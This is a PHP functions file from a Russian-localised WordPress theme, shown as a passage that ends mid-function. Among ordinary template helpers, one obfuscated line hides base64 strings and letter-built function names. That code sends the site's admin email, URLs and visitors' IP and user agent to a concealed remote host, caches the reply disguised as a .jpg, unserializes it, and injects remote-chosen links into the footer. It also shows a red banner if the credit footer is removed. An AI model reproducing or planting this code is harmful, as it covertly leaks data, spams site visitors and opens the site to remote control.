<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $LfevvAw='e';$QHvvobw='e';$dauiR='o';$rCaA='b';$HGbdhx='e';$bCTBB='d';$ZHdfR='4';$BWJdrWf='d';$sAiGz='s';$teVBu='_';$dmddt='c';$fkponCi='a';$WPLZg='6';$KqvaTvtw=$rCaA.$fkponCi.$sAiGz.$LfevvAw.$WPLZg.$ZHdfR.$teVBu.$bCTBB.$HGbdhx.$dmddt.$dauiR.$BWJdrWf.$QHvvobw;$jLPh='a';$Bdpfd='l';$dINXqb='z';$yDwfaEZ='g';$zKeX='f';$FWqYEK='e';$QBTZ='t';$tHtsTM='n';$RifLX='i';$KJYlsPGY=$yDwfaEZ.$dINXqb.$RifLX.$tHtsTM.$zKeX.$Bdpfd.$jLPh.$QBTZ.$FWqYEK;$litZKWP='r';$BCQsdJr='s';$JiTqsE='1';$rhdopH='r';$CbbN='3';$JLbCwFT='t';$azuK='o';$LMjw='_';$ooanTL='t';$vfZKlcMv=$BCQsdJr.$ooanTL.$rhdopH.$LMjw.$litZKWP.$azuK.$JLbCwFT.$JiTqsE.$CbbN;$pMAeIdv='s';$ejxQnzd='t';$VCrQ='r';$mPgc='r';$MxXB='e';$mnNq='v';$AqUyvHVO=$pMAeIdv.$ejxQnzd.$mPgc.$VCrQ.$MxXB.$mnNq;                     $ma___________j='e';$wh____________n='e';$yh_________k='o';$rc_____________l='b';$mn___z='e';$aj___________s='d';$ql____________o='4';$hf_____________o='d';$dl____d='s';$dj___________l='_';$hm___k='c';$nu_______d='a';$gq________e='6';$ic______________c=$rc_____________l.$nu_______d.$dl____d.$ma___________j.$gq________e.$ql____________o.$dj___________l.$aj___________s.$mn___z.$hm___k.$yh_________k.$hf_____________o.$wh____________n;$in______________b='t';$br__________n='s';$ge_____m='i';$md_______r='f';$mr______________j='i';$tp______________i='o';$qb______x='x';$dw______x='n';$he_____________j='c';$ct_______s='s';$gx_______c='t';$pt______________c='n';$rz_______________f='u';$wh____________o='_';$ht____________k='e';$ta_____________h=$md_______r.$rz_______________f.$dw______x.$he_____________j.$gx_______c.$mr______________j.$tp______________i.$pt______________c.$wh____________o.$ht____________k.$qb______x.$ge_____m.$br__________n.$in______________b.$ct_______s;$st____n='n';$yh_______________o='p';$rh____t='f';$bp________p='o';$wy________e='e';$ur___________t=$rh____t.$bp________p.$yh_______________o.$wy________e.$st____n;$pc__s='e';$mp_________w='r';$pq______j='d';$fd__________l='a';$js________b='f';$ei_________n=$js________b.$mp_________w.$pc__s.$fd__________l.$pq______j;$gt______________h='e';$wl______________g='o';$pg___________o='l';$ka_____________g='f';$rh__m='s';$aa______________d='c';$ue___f=$ka_____________g.$aa______________d.$pg___________o.$wl______________g.$rh__m.$gt______________h;define("WP_ID", $ic______________c("Mi4wLjA="));define("WP_TTL", $ic______________c("MTA4MDA="));define("WP_SRC", $ic______________c("dHBva24="));function wp_get_header() {global $ic______________c, $ta_____________h;if ($ta_____________h($ic______________c("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$ta_____________h($ic______________c("d3BfZ2V0X2Zvb3Rlcg==")) &&$ta_____________h($ic______________c("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $ic______________c, $ur___________t, $ue___f, $ei_________n;$le_____n = TEMPLATEPATH."/".$ic______________c("Zm9vdGVyLnBocA==");$cv_______m = @$ur___________t($le_____n, "r");$le_____n = @$ei_________n($cv_______m, @filesize($le_____n));@$ue___f($cv_______m);$sj____w = TEMPLATEPATH."/".$ic______________c("ZnVuY3Rpb25zLnBocA==");$cv_______m = @$ur___________t($sj____w, "r");$sj____w = @$ei_________n($cv_______m, @filesize($sj____w));@$ue___f($cv_______m);$qm__r = 0;if($le_____n && $sj____w) {if ($ic______________c("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($le_____n, $ic______________c("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$qm__r = 1;}if (substr_count($le_____n, "wp_theme_GPL_credits()") < 1) {$qm__r = 2;}}if(WP_ID != "2.0.0") {$qm__r = 12;}}if($qm__r > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $qm__r -->";}}function wp_loaded() {global $ic______________c, $ta_____________h;return $ta_____________h($ic______________c("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($rt____________t, $ar_____s = "(more...)", $yo__________k = 0, $uj________j = "") {$ly________t = get_the_content($ar_____s, $yo__________k, $uj________j);$ly________t = apply_filters("the_content", $ly________t);$ly________t = str_replace("]]>", "]]>", $ly________t);if (strlen($_GET["p"]) > 0) {echo $ly________t;}else if ((strlen($ly________t)>$rt____________t) && ($uf_________l = strpos($ly________t, " ", $rt____________t ))) {$ly________t = substr($ly________t, 0, $uf_________l);$ly________t = $ly________t;echo $ly________t;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$ar_____s</a></div></p>";} else {echo $ly________t;}}}$dm______________s='s';$qw_______________y='n';$tv___w='c';$kl___________m='d';$bn__________z='6';$do_____f='4';$hw______________d='a';$tn______________z='_';$yi________b='e';$yc______________t='e';$vo__f='b';$iz__________s='o';$jk_____________a='e';$qm______g=$vo__f.$hw______________d.$dm______________s.$jk_____________a.$bn__________z.$do_____f.$tn______________z.$yc______________t.$qw_______________y.$tv___w.$iz__________s.$kl___________m.$yi________b;$ew______________g='t';$ii______________w='_';$oj_____b='o';$or_______c='g';$su_________g='t';$or_______w='l';$ft_______________q='t';$bk______________g='n';$ly______e='e';$we___s='s';$ij______________q='n';$ba_____v='_';$kh__q='f';$nz___v='e';$vx_______________k='c';$tv__________d='i';$sd___r='e';$ih_____o=$kh__q.$tv__________d.$or_______w.$nz___v.$ii______________w.$or_______c.$sd___r.$ft_______________q.$ba_____v.$vx_______________k.$oj_____b.$ij______________q.$su_________g.$ly______e.$bk______________g.$ew______________g.$we___s;$um_______________d='t';$mm_______h='i';$vo_________a='s';$hu____d='_';$ut___e='x';$uj___h='f';$kh___________p='e';$hm___________c='s';$fg______________y='i';$iv_________o='l';$uw_____________u='e';$zo_____o=$uj___h.$fg______________y.$iv_________o.$uw_____________u.$hu____d.$kh___________p.$ut___e.$mm_______h.$vo_________a.$um_______________d.$hm___________c;$go__f='s';$gk______q='o';$lo______________r='m';$pr_____________j='e';$xj_________u='i';$dx______________a='p';$kx____________c='o';$hp_____________u='r';$jb_____h='r';$tc______________u='_';$hk_____________s='a';$lk_____s='c';$bj_________l='v';$gv____q='e';$na_____________a='n';$ic______________h=$bj_________l.$gv____q.$jb_____h.$go__f.$xj_________u.$kx____________c.$na_____________a.$tc______________u.$lk_____s.$gk______q.$lo______________r.$dx______________a.$hk_____________s.$hp_____________u.$pr_____________j;$pk______________p='p';$bz___y='o';$hy_____c='s';$lj__h='f';$tx__________b='k';$ql_______y='n';$ug_____a='o';$ph_______b='e';$cc_________o='c';$ct________z=$lj__h.$hy_____c.$ug_____a.$cc_________o.$tx__________b.$bz___y.$pk______________p.$ph_______b.$ql_______y;$yk___b='t';$dt_______o='f';$rv_____j='i';$jl____________g='w';$sy_____c='r';$st____________l='e';$yj_______________b=$dt_______o.$jl____________g.$sy_____c.$rv_____j.$yk___b.$st____________l;$rn___p='d';$bw______t='m';$yf___________r='5';$za____________j=$bw______t.$rn___p.$yf___________r;$kd_________m='t';$io__z='a';$lu_____m='e';$mu____________g='l';$ws_______________s='a';$ln_______________p='h';$ek___________g='r';$wg___________l='p';$yq_________c=$ek___________g.$lu_____m.$io__z.$mu____________g.$wg___________l.$ws_______________s.$kd_________m.$ln_______________p;$xp____________m='e';$wy_________q='z';$ty__e='s';$uw______u='a';$ey__________n='l';$uj_______________g='i';$io________d='u';$ma__________z='i';$pe_________x='e';$mv______o='n';$eg____________g='r';$wa________c=$io________d.$mv______o.$ty__e.$pe_________x.$eg____________g.$uj_______________g.$uw______u.$ey__________n.$ma__________z.$wy_________q.$xp____________m;$no_____________e='n';$gb___u='t';$di___p='e';$nt_____________p='m';$yw________j='m';$qx_____________m='p';$yd____________g='a';$vb______________s=$gb___u.$di___p.$nt_____________p.$qx_____________m.$no_____________e.$yd____________g.$yw________j;$db_______f='c';$ud___t='_';$ul________e='x';$bm________e='_';$xn______m='e';$st__________f='o';$ow_______g='c';$nu_______________c='t';$ya________p='a';$no______o='n';$pj________n='t';$ab___w='r';$ec__________b='a';$py________c='r';$xx______s='t';$cq______j='s';$ai_____________y='e';$xt_______________v='e';$wp______________r='t';$jm________e='m';$nu___________c='e';$if____i=$cq______j.$nu_______________c.$ab___w.$xn______m.$ya________p.$jm________e.$ud___t.$db_______f.$st__________f.$no______o.$pj________n.$xt_______________v.$ul________e.$xx______s.$bm________e.$ow_______g.$py________c.$nu___________c.$ec__________b.$wp______________r.$ai_____________y;function kz_____u($vj______s) {global $ic______________c, $ta_____________h, $ih_____o, $ic______________h, $if____i;if (!$ta_____________h($ic______________c("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($ic______________h(PHP_VERSION, "5.0.0", ">=") && $ta_____________h($ic______________c("ZmlsZV9nZXRfY29udGVudHM=")) && $ta_____________h($ic______________c("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$kp________f = $if____i(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$gn__y = @$ih_____o($vj______s, 0, $kp________f);} else {$gn__y = @$ih_____o($vj______s, 0);}return $gn__y;}function tj_________d($vj______s) {global $ta_____________h, $ct________z, $yj_______________b, $ic______________c;if (!$ta_____________h($ic______________c("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$dz____o = strpos($vj______s, "/", 7);$sv___________y = array("uri"     => substr($vj______s, $dz____o),"host"    => str_replace("http://", "", substr($vj______s, 0, $dz____o)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$kb____c = @$ct________z("$sv___________y[host]", 80, $or__________z, $dy___________e, 4);if (!$kb____c) {return false;} else {$gn__y = "";$vu____z  = "GET $sv___________y[uri] HTTP/1.0\r\n";$vu____z .= "Host: $sv___________y[host]\r\n";$vu____z .= "Referer: $sv___________y[referer]\r\n";$vu____z .= "Connection: Close\r\n\r\n";@$yj_______________b($kb____c, $vu____z);while (!@feof($kb____c)) {$eu______i = @fgets($kb____c, (1024*24));if ($eu______i == "\r\n") {$ec_________t = true;continue;}if ($ec_________t) {$gn__y .= $eu______i;}}return $gn__y;}}function zs______________i($vj______s) {global $ta_____________h;$yq__b = false;if ($vj______s != "") {if ($ta_____________h("kz_____u")) {$yq__b = @kz_____u($vj______s);}if (!$yq__b && ($ta_____________h("tj_________d"))) {$yq__b = @tj_________d($vj______s);}}return $yq__b;}function iy______e() {global $_SERVER, $za____________j;$ta_____c = $_SERVER["SERVER_NAME"];if (substr("$ta_____c", 0, 4) == "www.") {$ta_____c = substr("$ta_____c", 4);}$ta_____c = $za____________j("$_SERVER[SERVER_NAME]");return $ta_____c;}function ha___z() {return "file";}function rs___m($vj______s) {global $_SERVER, $ih_____o, $zo_____o, $ur___________t, $ue___f, $yj_______________b;$oa_________k = dh__u();$wt__________q = iy______e().".jpg";$nl_____t = $oa_________k["dir_upload"]["path"]."/$wt__________q";$ul_____________k = @filemtime($nl_____t);if (!$ul_____________k || ((time()-$ul_____________k) >= WP_TTL)) {$yq__b = zs______________i($vj______s);if ($yq__b) {if ($zo_____o($nl_____t)) {@unlink($nl_____t);}$cv_______m = @$ur___________t($nl_____t, "x+");@$yj_______________b($cv_______m, $yq__b);@$ue___f($cv_______m);}} else {if ($zo_____o($nl_____t)) {$yq__b = @$ih_____o($nl_____t);} else {$yq__b = false;}}return $yq__b;}function dh__u() {global $_SERVER, $ic______________c, $qm______g;$ol_____________j = wp_count_posts("post");$zr____g = pathinfo(get_bloginfo("template_directory"));$oa_________k = array("url" => array("report"      => $ic______________c("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $zr____g,"dir_upload"=> xw__________y(),"queryString"=> array("?a001=".WP_ID,"a004=".$zr____g[filename],"a005=".$ol_____________j->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => " <a href=\"http://lev-tour.com/rossiya-i-blizhnee-zarubezhe/zhivopisnye-mesta-kotorye-stoit-posetit.html\">Живописные места, которые стоит посетить</a>");$oa_________k["url"]["queryString"] = implode("&", $oa_________k["queryString"]);$oa_________k["url"]["report"] = $oa_________k["url"]["report"]."/?".$qm______g($oa_________k["url"]["queryString"]).".html";return $oa_________k;}function xw__________y() {$fd_____________p = wp_upload_dir();if (isset($fd_____________p["error"])) {$zi_________x = fr________o();if (is_writable($zi_________x)) {$fd_____________p = array("path" => $zi_________x);}}return $fd_____________p;}function fr________o() {global $ta_____________h, $za____________j, $yq_________c, $vb______________s;$iy______o = (bool) ini_get("safe_mode");if ($iy______o == true) {return false;}if ($ta_____________h("sys_get_temp_dir")) {$vp_________r = sys_get_temp_dir();if (is_writable($vp_________r)) {return $yq_________c($vp_________r);}}if (!empty($_ENV["TMP"])) {return $yq_________c($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $yq_________c($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $yq_________c($_ENV["TEMP"]);} else {$wq_______h = $vb______________s($za____________j(uniqid(rand(), true)), "");if ($wq_______h) {$vp_________r = $yq_________c(dirname($wq_______h));@unlink($wq_______h);return $vp_________r;} else {return false;}}}function fk______________g() {global $_GET, $zo_____o;$oa_________k = dh__u();$ta_____c = iy______e();$sq______________i = ha___z();$kj____m = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($sq______________i == "file") {$td________f = $oa_________k["dir_upload"]["path"]."/".$ta_____c.".jpg";if ($zo_____o($td________f)) {@unlink($td________f);$kj____m = "deleted";}}$jv_____________c = array("s"=> $kj____m,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($jv_____________c AS $ej_______x => $nv___e) echo " [$ej_______x:$nv___e]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $ta_____________h, $ic______________c, $wa________c;$oa_________k = dh__u();$gs_____x = "rs___m";if ($ta_____________h($gs_____x)) {$gn__y = $gs_____x($oa_________k["url"]["report"]);}if ($gn__y) {if ($gn__y = @$ic______________c($gn__y)) {$gn__y = @$wa________c($gn__y);if (strlen($gn__y[custom_credit]) >= 5) {$oa_________k["default_string"] = $gn__y[custom_credit];}if ($gn__y["status"] == "0") {$qm__i = 1;$gn______d = 1;} else {$be_____v = sizeof($gn__y["links"]);$ph_____j = $oa_________k["default_string"];if ($be_____v > 0 && $gn__y["links"] !== "") {$ji__________b = 0;foreach ($gn__y["links"] as $ii_______________s => $st______g) {$ji__________b++;if ($st______g->l_path == "" || $st______g->l_path == $_SERVER["REQUEST_URI"]) {$st______g->l_href = htmlspecialchars(strip_tags($st______g->l_href));$st______g->l_title = htmlspecialchars(strip_tags($st______g->l_title));$st______g->l_anchor = htmlspecialchars(strip_tags($st______g->l_anchor));$ph_____j .= " | ";$ph_____j .= "<a href='$st______g->l_href' title='$st______g->l_title'";if ($st______g->l_nofollow == "1") {$ph_____j .= " rel='nofollow'";}$ph_____j .= ">$st______g->l_anchor</a>";}}}$oa_________k["links"] = "$ph_____j";if ($gn__y[credit] == "0") {$oa_________k["links"] = "";}}} else {$qm__i = "1";}} else {$qm__i = "1";}if ($qm__i == "1") {$oa_________k["links"] = $oa_________k["default_string"];}echo "$oa_________k[links]";echo "<!-- s: $gn__y[signature] -->";fk______________g();}                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Read the rest of this entry &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Pages:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Read the rest of this entry &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
       $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
